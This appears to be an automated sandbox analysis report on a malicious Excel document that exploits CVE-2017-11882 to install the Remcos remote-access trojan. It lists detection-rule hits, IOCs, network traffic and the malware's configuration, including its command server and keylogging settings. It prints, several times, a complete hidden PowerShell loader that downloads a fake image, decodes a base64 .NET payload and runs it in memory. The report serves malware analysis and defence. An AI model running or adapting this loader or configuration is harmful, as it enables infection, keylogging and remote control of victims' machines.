            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.EWH/005001/451.871.64.891//:ptth' , '1' , 'C:\ProgramData\' , 'incontrovertido','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += 
$webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.EWH/005001/451.871.64.891//:ptth' , '1' , 'C:\ProgramData\' , 'incontrovertido','RegAsm',''))} }"
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.EWH/005001/451.871.64.891//:ptth' , '1' , 'C:\ProgramData\' , 'incontrovertido','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in 
$shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.EWH/005001/451.871.64.891//:ptth' , '1' , 'C:\ProgramData\' , 'incontrovertido','RegAsm',''))} }"
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\onsandtigerbeautifulpicture.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\onsandtigerbeautifulpicture.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1648, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\onsandtigerbeautifulpicture.vbs" , ProcessId: 3400, ProcessName: wscript.exe
            Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 1648, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
            Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '
            Source: File created, Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 1668, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
            Source: File created, Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3508, TargetFilename: C:\Users\user\AppData\Local\Temp\mzbur00x.4zp.ps1

            Data Obfuscation

            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.EWH/005001/451.871.64.891//:ptth' , '1' , 'C:\ProgramData\' , 'incontrovertido','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; 
return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.EWH/005001/451.871.64.891//:ptth' , '1' , 'C:\ProgramData\' , 'incontrovertido','RegAsm',''))} }"

            Stealing of Sensitive Information

            Source: Registry Key setAuthor: Joe Security: Data: Details: CC C0 05 F8 36 77 FF 59 27 3F 52 CE FC 6B 29 F4 01 51 C6 7F D4 F9 81 6A A4 65 7F 05 A3 94 9F E7 97 F1 FE 17 20 A1 AD 1D 85 9E 4E 18 7D 5C 23 79 AD E1 C1 0E 06 23 D4 2A 0B 82 5C BA BD 87 A8 1F E6 3B 36 83 8F E7 02 1D C7 DD 21 B7 96 67 AA 0D B6 E4 7B EA 7A 65 6B D5 78 8A 95 65 C7 B4 90 4A 85 E2 73 85 16 4A 78 E7 49 AF 8E 2F 63 5C F9 16 16 23 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 3972, TargetObject: HKEY_CURRENT_USER\Software\Rmc-999Z97\exepath
            Timestamp:05/27/24-09:00:53.917151
            SID:2049038
            Source Port:443
            Destination Port:49174
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-09:00:51.165055
            SID:2018856
            Source Port:443
            Destination Port:49174
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-09:00:51.165055
            SID:2047750
            Source Port:443
            Destination Port:49174
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-09:00:58.159972
            SID:2020424
            Source Port:80
            Destination Port:49175
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-09:00:58.159972
            SID:2020423
            Source Port:80
            Destination Port:49175
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/27/24-09:00:53.346879
            SID:2025012
            Source Port:443
            Destination Port:49174
            Protocol:TCP
            Classtype:A Network Trojan was detected

            AV Detection

            Source: http://geoplugin.net/json.gp, URL Reputation: Label: phishing
            Source: http://geoplugin.net/json.gp/C, URL Reputation: Label: phishing
            Source: https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634, Avira URL Cloud: Label: malware
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lioniskingandtigerisalsotryingforkingbutdifferentistheattitudeofthistwoanimalaredifferentlionsisalwaysalionitsucantcomparewith__anyotherbecauselionbeauties[1].doc, Avira: detection malicious, Label: HEUR/Rtf.Malformed
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A9EAB33D.doc, Avira: detection malicious, Label: HEUR/Rtf.Malformed
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{8D0975D7-21A3-4DB8-9D99-C358C75C774D}.tmp, Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
            Source: 00000011.00000002.1078551055.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Remcos {"Host:Port:Password": "sembe.duckdns.org:14645:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-999Z97", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "nots.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
            Source: sembe.duckdns.org, Virustotal: Detection: 12%
            Source: uploaddeimagens.com.br, Virustotal: Detection: 5%
            Source: http://198.46.178.154/100500/vff/lioniskingandtigerisalsotryingforkingbutdifferentistheattitudeofthistwoanimalaredifferentlionsisalwaysalionitsucantcomparewith__anyotherbecauselionbeauties.doc, Virustotal: Detection: 7%
            Source: http://198.46.178.154/100500/HWE.txt, Virustotal: Detection: 7%
            Source: https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634, Virustotal: Detection: 12%
            Source: http://198.46.178.154/100500/lionsandtigerbeautifulpicture.bmpj, Virustotal: Detection: 7%
            Source: https://uploaddeimagens.com.br, Virustotal: Detection: 6%
            Source: http://198.46.178.154/100500/lionsandtigerbeautifulpicture.bmp, Virustotal: Detection: 7%
            Source: Ref19920830281982938RT.xls, Virustotal: Detection: 7%
            Source: Yara matchFile source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.powershell.exe.465ae68.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.powershell.exe.465ae68.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.1078551055.00000000008B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.466787853.0000000004477000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3608, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3972, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\note\nots.dat, type: DROPPED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,17_2_00433837
            Source: powershell.exe, 0000000C.00000002.466787853.0000000004477000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_2f5b1223-3

            Exploits

            Source: Yara matchFile source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.powershell.exe.465ae68.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.powershell.exe.465ae68.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.466787853.0000000004477000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3608, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3972, type: MEMORYSTR
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Network connect: IP: 198.46.178.154 Port: 80
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Windows\SysWOW64\wscript.exe
            Source: ~WRF{8D0975D7-21A3-4DB8-9D99-C358C75C774D}.tmp.4.drStream path '_1778283989/\x1CompObj' : ...................F....Microsoft Equation 3.0....
            Source: ~WRF{8D0975D7-21A3-4DB8-9D99-C358C75C774D}.tmp.4.drStream path '_1778283994/\x1CompObj' : ...................F....Microsoft Equation 3.0....
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

            Privilege Escalation

            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004074FD _wcslen,CoGetObject,17_2_004074FD
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49173 version: TLS 1.0
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49172 version: TLS 1.2
            Source: Binary string: F:\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.466787853.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.502494701.00000000093C0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: F:\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdbSHA256 source: powershell.exe, 0000000C.00000002.466787853.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.502494701.00000000093C0000.00000004.08000000.00040000.00000000.sdmp
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_00409253
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,17_2_0041C291
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,17_2_0040C34D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_00409665
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0044E879 FindFirstFileExA,17_2_0044E879
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,17_2_0040880C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040783C FindFirstFileW,FindNextFileW,17_2_0040783C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,17_2_00419AF5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,17_2_0040BB30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,17_2_0040BD37
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,17_2_00407C97

            Software Vulnerabilities

            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Source: global trafficDNS query: name: z2.ink
            Source: global trafficDNS query: name: paste.ee
            Source: global trafficDNS query: name: uploaddeimagens.com.br
            Source: global trafficDNS query: name: sembe.duckdns.org
            Source: global trafficDNS query: name: geoplugin.net
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 54.241.153.192:80
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 198.46.178.154:80
            Source: global trafficTCP traffic: 192.168.2.22:49177 -> 178.237.33.50:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.97.3:443
